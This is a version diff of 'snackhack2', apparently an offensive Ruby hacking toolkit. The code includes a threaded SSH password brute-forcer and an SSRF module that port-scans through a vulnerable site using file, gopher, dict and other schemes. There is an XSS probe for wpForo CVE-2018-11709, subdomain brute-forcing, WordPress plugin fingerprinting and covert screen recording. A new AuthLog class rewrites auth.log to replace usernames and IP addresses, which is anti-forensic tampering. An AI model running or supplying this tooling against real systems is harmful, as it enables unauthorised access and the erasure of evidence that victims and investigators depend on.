snackhack2 0.6.7 → 0.6.9

data/lib/snackhack2/robots.rb

@@ -2,13 +2,16 @@
 
 module Snackhack2
   class Robots
-    def initialize(site, save_file: true)
+    attr_accessor :port, :site, :save_file, :http
+    def initialize(site: "", save_file: true)
       @site = site
-      @http = Snackhack2.get(File.join(@site, 'robots.txt'))
-      @save_file = save_file
+
+    end
+    def site=(t)
+      @http = File.join(t, 'robots.txt')
     end
 
-    attr_reader :save_file
+    # attr_reader :save_file
 
     def run
       save_txt_file = ''
@@ -28,16 +31,27 @@ module Snackhack2
           end
         end
       else
-        puts allow
-        puts disallow
+        unless allow[1].empty?
+          puts "ALLOW: "
+          allow[1].each do |a|
+            puts a
+          end
+        end
+        unless disallow[1].empty?
+          puts "Disallow: "
+          disallow[1].each do |d|
+            puts d
+          end
+        end
       end
-      Snackhack2.file_save(@site, 'robots', save_txt_file) if @save_file
+    Snackhack2.file_save(@site, 'robots', save_txt_file) if @save_file
     end
 
     def allow_robots
       allow_dir = []
-      if @http.code == 200
-        body = @http.body.lines
+      http = Snackhack2.get(@http)
+      if http.code == 200
+        body = http.body.lines
         body.each do |l|
           allow_dir << l.split('Allow: ')[1] if l.match(/Allow:/)
         end
@@ -46,21 +60,25 @@ module Snackhack2
       end
       open_links = []
       allow_dir.each do |path|
-        link = Snackhack2.get(File.join(@site, path.strip))
+        link = Snackhack2.get(@http)
         if link.code == 200
           valid_links = "#{@site}#{path}"
           open_links << valid_links
         end
       end
-      open_links
+      [ open_links, allow_dir]
     end
 
     def disallow_robots
+      http = Snackhack2.get(@http)
       disallow_dir = []
-      if @http.code == 200
-        body = @http.body.lines
+      if http.code == 200
+        body = http.body.lines
         body.each do |l|
-          disallow_dir << l.split('Disallow: ')[1] if l.match(/Disallow:/)
+          if l.match(/Disallow:/)
+
+            disallow_dir << l.split('Disallow: ')[1]
+          end 
         end
       else
         puts "[+] Not giving code 200.\n"
@@ -74,7 +92,7 @@ module Snackhack2
         end
       rescue StandardError
       end
-      open_links
+      [ open_links, disallow_dir]
     end
   end
 end

data/lib/snackhack2/ruby_comments.rb

@@ -0,0 +1,46 @@
+module Snackhack2
+	class RubyComments
+		attr_accessor :file
+		def initialize
+			@file = file
+		end
+		def comment_block
+			if File.exist?(@file)
+			  comments = []
+			  in_comment_block = false
+			  File.readlines(@file).each do |file|
+			    file.each_line do |line|
+			      if line.strip.eql? '=begin'
+			        in_comment_block = true
+			        next
+			      elsif line.strip.eql? '=end'
+			        in_comment_block = false
+			        next
+			      end
+
+			      if in_comment_block
+			        comments << line
+			      end
+			    end
+			  end
+			  comments.each do |c|
+			  	puts c
+			  end
+			else
+				puts "#{@file} does not exist."
+			end
+		end
+		def comments
+			if File.exist?(@file)
+				File.readlines(@file).each do |l|
+					line = l.to_s
+					if line.to_s.start_with?("#")
+						puts l
+					end
+				end
+			else 
+				puts "#{@file} does not exist."
+			end
+		end
+	end
+end

data/lib/snackhack2/screenshots.rb

@@ -12,12 +12,19 @@ module Snackhack2
     end
 
     def run
+      # creates a `.bat` filw with a command that will start the screen recordings
       File.open('lol.bat', 'w+') { |file| file.write("psr.exe /start /output #{@zip} /sc 1 /gui 0") }
+      # this will save a .bat file that will stop the recording
       File.open('lol2.bat', 'w+') { |file| file.write('psr.exe /stop') }
+      # run `lol.bat`
       Process.spawn('lol.bat')
+      # sleeps for the amount of time declared in instance variable `@time` which by 
+      # defualt is 60 seconds 
       sleep @time.to_i
+      # runs lol2.bat
       system('lol2.bat')
       sleep 2
+      # deletes both `lol.bat` and `lol2.bat`.
       File.delete('lol.bat')
       File.delete('lol2.bat')
     end

data/lib/snackhack2/sitemap.rb

@@ -4,14 +4,22 @@ require 'httparty'
 require 'nokogiri'
 module Snackhack2
   class SiteMap
-    def initialize(site)
+    attr_accessor :site
+    def initialize
       @site = site
     end
 
     def run
+      # adds `sitemap.xml` to the site given 
+      # defined in `@site` instance variable.
       sm = Snackhack2.get(File.join(@site, 'sitemap.xml'))
-      if sm.code == 200
-        if !sm.body.include?('Not Found')
+      # site returns 200 status code
+      if sm.code.to_i.eql?(200)
+        # checks the body of the page to detetmine if the words
+        # `Not Found` is it
+        unless sm.body.include?('Not Found')
+          # the page did not include "Not Found". Saving the contents of the sitemap.xml 
+          # to a file.
           Snackhack2.file_save(@site, 'site.xml', sm.body)
         else
           puts "[+] Eh. I don't think the site has a sitemap. Manually check just in case... :(\n\n"

data/lib/snackhack2/sshbrute.rb

@@ -10,11 +10,14 @@ module Snackhack2
     end
 
     def list
+      # the list of usernames and password.
+      # username:password
       File.join(__dir__, 'lists', 'sshbrute.txt')
     end
 
     def run
       threads = []
+      # uses threads to make it faster
       File.readlines(list).each { |usr, pass| threads << Thread.new { brute(usr, pass) } }
       threads.each(&:join)
 
@@ -22,8 +25,11 @@ module Snackhack2
     end
 
     def brute(username, pass)
+      # does the bruting.
+      # saves the valid creds to the @success_list instance variable array
       Net::SSH.start(@ip, username, password: pass, timeout: 1) do |ssh|
         @success_list << [username, pass]
+        # runs the `hostame command if valid
         ssh.exec!('hostname')
       end
     rescue Net::SSH::AuthenticationFailed

data/lib/snackhack2/ssrf.rb

@@ -2,15 +2,63 @@
 
 # Process.spawn("ruby -run -ehttpd . -p8008")
 # sleep 10
+require 'typhoeus'
 module Snackhack2
   class SSRF
-    attr_accessor :site
-
+    attr_accessor :site, :ssrf_site, :protocol
     def initialize
       @site = site
+      @ssrf_site = ssrf_site
+      @protocol = protocol
     end
-
-    def ssrf
+    def get_protocol
+      case @protocol.downcase
+      when "https"
+        "https://"
+      when "ftp"
+        "ftp://"
+      when "http"
+        "http://"
+      when "file"
+        "file://"
+      when "dict"
+        "dict://"
+      when "gopher"
+        "gopher://"
+      when "sftp"
+        "sftp://"
+      when "tftp"
+        "tftp://"
+      when "ldap"
+        "ldap://"
+      end
+    end
+    def http_port_scan(port_count: 8082)
+      hydra = Typhoeus::Hydra.new
+      i = 0
+      # Where found ports will be saved.
+      found_ports = []
+      # tries 65530 ports
+      65530.times.each_with_index.map{ |i|
+        # adds the port to @ssrf
+        site = @site.gsub("SSRF", "#{@ssrf_site}") + ":" + i.to_s
+        request = Typhoeus::Request.new("#{site}", followlocation: true)
+        hydra.queue(request)
+        request.on_complete do |response|
+          # If the response code returns 200 it will save
+          # the port number to `found_ports`.
+          if response.code.to_i.eql?(200)
+            puts i
+            puts "#{response.code}"
+            found_ports << i
+          end
+        end
+      }
+      hydra.run
+    # returns the `found_ports` array.
+    found_ports
+    end
+    def ssrf_google
       url = @site.gsub('SSRF', 'http://google.com')
       ht = HTTParty.get(url)
       if ht.body.include?("Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for.")

data/lib/snackhack2/subdomains.rb

@@ -5,16 +5,14 @@ require 'resolv'
 require 'async/http/internet'
 module Snackhack2
   class Subdomains
-    def initialize(site, wordlist: nil)
+    attr_accessor :site
+    def initialize(wordlist: nil)
       @site     = site
       @wordlist = wordlist
     end
 
-    def site
-      @site.gsub('https://', '')
-    end
-
     def wordlist
+      # gets the location of the subdomains list
       File.join(__dir__, 'lists', 'subdomains.txt')
     end
 
@@ -26,10 +24,15 @@ module Snackhack2
 
     def brute
       found = ''
+      # loops through each of the subdomains and adds it to
+      # the site which checks if it returns a `200` status code or `300` status code
+      unless @site.nil?
+        @site = @site.gsub("https://", "")
+      end
       File.readlines(wordlist).each do |l|
-        s = "#{l.strip}.#{site}"
+        s = "#{l.strip}.#{@site}"
+        p File.join('https://', s)
         begin
-          puts File.join('https://', s)
           g = Snackhack2.get(File.join('https://', s))
           if g.code == 200
             found += "#{s}\n"

data/lib/snackhack2/subdomains2.rb

@@ -3,7 +3,8 @@
 require 'async/http/internet'
 module Snackhack2
   class Subdomains2
-    def initialize(site)
+    attr_accessor :site
+    def initialize
       @site = site
       @urls = []
     end
@@ -18,7 +19,10 @@ module Snackhack2
 
     def run
       File.readlines(wordlist).each do |a|
+        # removes `https://` from the instance variable
+        # `@site`. Adds the subdomain from the file to test if it is valid
         url = "https://#{a.strip}.#{@site.gsub('https://', '')}"
+        
         fetch(url)
         puts url
       end
@@ -30,6 +34,8 @@ module Snackhack2
         task.with_timeout(2) do
           internet = Async::HTTP::Internet.new
           m = internet.get(url, { 'user-agent' => Snackhack2::UA })
+          # only adds it to the @url instance variable if
+          # it returns a status code of `200` OR `301`
           @urls << url if (m.status == 200) || (m.status == 301)
           m.read
         end

data/lib/snackhack2/tomcat.rb

@@ -3,20 +3,33 @@
 require 'nokogiri'
 module Snackhack2
   class TomCat
-    def initialize(site)
+    attr_accessor :site
+    def initialize
       @site = site
     end
 
     def run
-      tc = Snackhack2.get(File.join(@site, '/docs/'))
-      if tc.code == 404
-        if tc.body.include?('Tomcat')
-          doc = Nokogiri::HTML(tc.body)
-          version = doc.at('h3').text
-          puts "[+] Looks like the site is Tomcat, running #{version}."
+      # adds `/docs/` to the instance variable @site
+      tc = Snackhack2.get(@site)
+      if tc.headers.has_key?("server")
+        if tc.headers['server'].match?("Tomcat")
+          puts "[+] Found Tomcat in the site's header... #{tc.headers['server']}\n\n\n"
+          tc_body = Snackhack2.get(File.join(@site, '/docs/'))
+          if tc_body.code.to_i.eql?(404)
+            if tc_body.body.include?('Tomcat')
+              doc = Nokogiri::HTML(tc.body)
+              # it will then extract the version displayed if
+              # the word is found
+              begin
+                # use to get the version
+                version = doc.at('h3').text
+                puts "[+] Looks like the site is Tomcat, running #{version}."
+              rescue => e
+                puts "ERROR: #{e}"
+              end
+            end
+          end
         end
-      else
-        puts "[+] Status code: #{tc.code}"
       end
     end
   end

data/lib/snackhack2/version.rb

@@ -1,5 +1,5 @@
 # frozen_string_literal: true
 
 module Snackhack2
-  VERSION = '0.6.7'
+  VERSION = '0.6.9'
 end

data/lib/snackhack2/webserver_log_cleaner.rb

@@ -16,6 +16,7 @@ module Snackhack2
       File.readlines(@path).each do |line|
         old_ip = line.match(/((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/)
         out += if old_ip.to_s == @ip
+                  # replaces the old IP with the new_ip
                  line.gsub(old_ip.to_s, new_ip)
                else
                  line
@@ -25,4 +26,58 @@ module Snackhack2
       File.open(@path, 'w+') { |file| file.write(out) }
     end
   end
+  class AuthLog
+    attr_accessor :ip, :user
+    def initialize(path: File.join("/var", "log", "auth.log.2"), user: "root")
+      @ip = ip
+      @user = user 
+      @user_list = ["user", "admin", "nobody", "proxy", "test", "tom", "frank", "irc", "sshd", "mail"]
+      @path = path
+    end
+    def remove_username
+      # replaces the username inputted with one
+      # 'randomly' picked from @user_list
+      out = ""
+      # loops through the given file
+      File.readlines(@path).each do |user|
+        new_user = user.match(/#{@user}/)
+        if new_user.to_s.eql?(@user)
+          # replaces the matched user with a 
+          # 'randomly' ( .sample) user
+          out += user.gsub(new_user.to_s, @user_list.sample)
+        else
+          # if it does not match it will add the non matched
+          # line to the newly created one
+          out += user
+        end
+      end
+    File.delete(@path)
+    File.open(@path, 'w+') { |file| file.write(out) }
+    end
+    def remove_ip
+      out = ''
+        # generate random IP
+        new_ip = Array.new(4) { rand(256) }.join('.')
+        File.readlines(@path).each do |line|
+          # Uses .match and regex to match IPs
+          old_ip = line.match(/((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/)
+          out += if old_ip.to_s == @ip
+                  # replace the foud ip with a randomly generated IP
+                   line.gsub(old_ip.to_s, new_ip)
+                 else
+                  # if it does not find the inputted IP
+                  # it will return the line
+                   line
+                 end
+        end
+        # deletes the @path
+        File.delete(@path)
+        # saves the new log to the old path
+        File.open(@path, 'w+') { |file| file.write(out) }
+    end
+    def remove_all
+      remove_ip
+      remove_username
+    end
+  end
 end

data/lib/snackhack2/website_links.rb

@@ -12,10 +12,14 @@ module Snackhack2
     end
 
     def run
+      # uses nokogiri to get the source of the page
       doc = Nokogiri::HTML(URI.open(@site))
+      # uses the xpath to get all the links on the source code
       links = doc.xpath('//a')
+      # gets the links
       all_links = links.map { |e| e['href'] }.compact
-      content = all_links.uniq.join("\n")
+      # remove any duplicates
+      content = all_links.uniq.join("\n")   
       if @save_file
         Snackhack2.file_save(@site, 'links', content)
       else

data/lib/snackhack2/website_meta.rb

@@ -6,7 +6,7 @@ module Snackhack2
   class WebsiteMeta
     attr_accessor :site
 
-    def initialize()
+    def initialize
       @site = site
     end
 
@@ -14,17 +14,17 @@ module Snackhack2
       doc = Nokogiri::HTML(URI.open(@site))
       posts = doc.xpath('//meta')
       posts.each do |link|
+        # displays the meta tags of name, content and name
         puts "#{link.attributes['name']}: #{link.attributes['content']}" unless link.attributes['name'].nil?
       end
     end
     def description
       begin
         doc = Nokogiri::HTML(URI.open("https://#{@site}", "User-Agent" => Snackhack2::UA))
-        if !doc.xpath('/html/head/meta[@name="description"]/@content').to_s.empty?
-          doc.xpath('/html/head/meta[@name="description"]/@content').to_s
+        unless doc.xpath('/html/head/meta[@name="description"]/@content').to_s.empty?
+          # extracts the description tag from meta tags
+          puts doc.xpath('/html/head/meta[@name="description"]/@content').to_s
         end
-        #dsp << 
-
       rescue => e
         puts "ERROR: #{e}"
       end

data/lib/snackhack2/wordpress.rb

@@ -54,6 +54,7 @@ module Snackhack2
     end
 
     def wp_login
+      # detects if the site is using wordpress
       percent = 0
       ## todo: maybe add Bayes Theorem to detect wp
       wp = ['wp-includes', 'wp-admin', 'Powered by WordPress', 'wp-login.php', 'yoast.com/wordpress/plugins/seo/',
@@ -71,25 +72,73 @@ module Snackhack2
       puts "Wordpress Points: #{percent}"
     end
 
-    def yoast_seo
+    def yoast_seo(print_version: false)
+      # checks to see if the wordpress site
+      # uses the yoast seo plugin
       ys = Snackhack2.get(@site)
-      return unless ys.code == 200
-
-      yoast_version = ys.body.split('<!-- This site is optimized with the Yoast SEO Premium plugin')[1].split(' -->')[0]
-      ['This site is optimized with the Yoast SEO plugin',
-       'This site is optimized with the Yoast SEO Premium plugin'].each do |site|
-        puts "#{ys.body.scan(/#{site}/).shift} with version #{yoast_version}" unless ys.body.scan(/#{site}/).shift.nil?
+      if ys.code.to_i.eql?(200)
+        if ys.body.match?("Yoast")
+          v = ys.body.scan(/This site is optimized with the Yoast SEO plugin\sv\d\d\.\d/).join(" ")
+          # makes sure the word 'plugin' is in the 'v' string
+          if v.include?("plugin") 
+            # gets the version
+            version = v.split("plugin")[1].strip
+          end
+        end
+      end
+      unless print_version
+        return version
+      else
+        puts "Yoast Seo is running version: #{version}"
       end
     end
 
-    def all_in_one_seo
+    def find_plugins(print_version: true)
+      found_versions = {}
       alios = Snackhack2.get(@site)
-      return unless alios.code == 200
-      return unless alios.body.scan(/(All in One SEO Pro\s\d.\d.\d)/)
-
-      puts "Site is using the plugin: #{alios.body.match(/(All in One SEO Pro\s\d.\d.\d)/)}"
+      if alios.code.eql?(200)
+        data = {"Yoast SEO plugin " => 'Yoast SEO plugin v\d\d\.\d',
+                "MonsterInsights plugin" => 'MonsterInsights plugin v\d\d\.\d\.\d',
+                "All in One SEO" => 'All in One SEO \d\.\d\.\d\.\d',
+                "Site Kit by Google" => 'Site Kit by Google \d\.\d\d\d\.\d',
+                 "Google Analytics by ExactMetrics plugin" => 'Google Analytics by ExactMetrics plugin v\d\.\d\d\.\d', "HubSpot WordPress plugin" => 'HubSpot WordPress plugin v\d\d\.\d\.\d\d', "Simple Social Buttons" => 'Simple Social Buttons \d\.2\.0', 
+                 "Powered by Slider Revolution" => 'Powered by Slider Revolution \d\.\d\.\d\d', "Generated By Events-Calendar - Version:" => 'Generated By Events-Calendar - Version: \d\.\d\.\d',
+                 "Open Graph and Twitter Card Tags" => 'Open Graph and Twitter Card Tags \d\.\d\.\d',
+                 "Google Analytics Tracking by Google Analyticator" => 'Google Analytics Tracking by Google Analyticator \d\.\d\.\d', "REVOLUTION SLIDER" => 'REVOLUTION SLIDER \d\.\d\.\d',
+                 "Generated By sidebarTabs" => 'Generated By sidebarTabs \d\.\d',\
+                 "Yoast WordPress SEO plugin" => 'Yoast WordPress SEO plugin v\d\.\d\.\d',
+                 "Yoast SEO Premium plugin" => 'Yoast SEO Premium plugin v\d\d\.\d \(Yoast SEO v27\.1\.1\)',
+                 "Google Analytics by MonsterInsights plugin" => 'Google Analytics by MonsterInsights plugin v\d\d\.\d\.\d',
+                 "All in One SEO (AIOSEO\)" => 'All in One SEO \(AIOSEO\) \d\.\d\.\d',
+                 "EduBlock PRO" => 'EduBlock PRO \d\.\d\.\d',
+                 "WPZOOM Framework" => 'WPZOOM Framework \d\.0\.\d',
+                 "WPML" => 'WPML ver:\d\.\d\.\d',
+                 "Redux" => 'Redux \d\.\d\.\d',
+                 "WordPress Download Manager"=> 'WordPress Download Manager \d\.\d\.\d\d',
+                 "WP Rocket" => 'WP Rocket \d\.\d\d\.\d',
+                 "WooCommerce" => 'WooCommerce \d\d\.\d\.\d',
+                 "Yoast SEO plugin" => 'Yoast SEO plugin v\d\.\d',
+                 "Divi" => 'Divi v\.\d\.\d\d\.\d',
+                 "WordPress" => 'WordPress \d\.\d\.\d',
+                 "Newtek ChildTheme Base for Divi " => 'Newtek ChildTheme Base for Divi v\.\d\.\d',
+                 "Presence" => 'Presence \d\.\d\.\d\d',
+                 "WPZOOM Framework" => 'WPZOOM Framework \d\.\d\.\d'}
+        data.each do |name, regex|
+          version = alios.body.scan(/#{regex}/)
+
+          unless version.empty?
+            found_versions[name] = version.shift.gsub(name, "").strip
+          end
+        end
+      end
+      unless print_version 
+        return found_versions
+      else
+        found_versions.each do |name, version|
+          puts "#{name}: #{version}" 
+        end
+      end
     end
-
     def wp_log
       wplog_score = 0
       wp = ['\wp-content\plugins', 'PHP Notice', 'wp-cron.php', '/var/www/html', 'Yoast\WP\SEO', 'wordpress-seo']
@@ -105,6 +154,7 @@ module Snackhack2
 
     def wp_plugin
       wp_plugin_score = 0
+      # text in which it will search for
       wp = ['Index of', 'Name', 'Last modified', 'Size', 'Parent Directory', '/wp-content/plugins']
       plug = Snackhack2.get(File.join(@site, '/wp-content/plugins/'))
       if plug.code == 200

data/lib/snackhack2/wpForo_Forum.rb

@@ -14,6 +14,7 @@ module Snackhack2
     def run
       wp = HTTParty.get(File.join(@site, '/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'))
       if wp.code == 200
+        # if `XSS` is found it means the site MIGHT be vulnerable
         puts "[+] #{@site} is vulnerable to CVE-2018-11709..." if wp.match(/XSS/)
       else
         puts "[+] HTTP code #{wp.code}"

data/lib/snackhack2.rb

@@ -86,7 +86,17 @@ module Snackhack2
       File.delete(file)
     end
   end
-
+  def self.read_emails
+    email_filter = []
+    Dir['*_emails.txt'].each do |file|
+      File.readlines(file).each do |k|
+        domain =  k.split(".")[1].strip
+        unless domain.eql?("png")
+          puts k
+        end
+      end
+    end
+  end
   def self.read_portscan
     files = Dir['*_port_scan.txt']
     files.each do |f|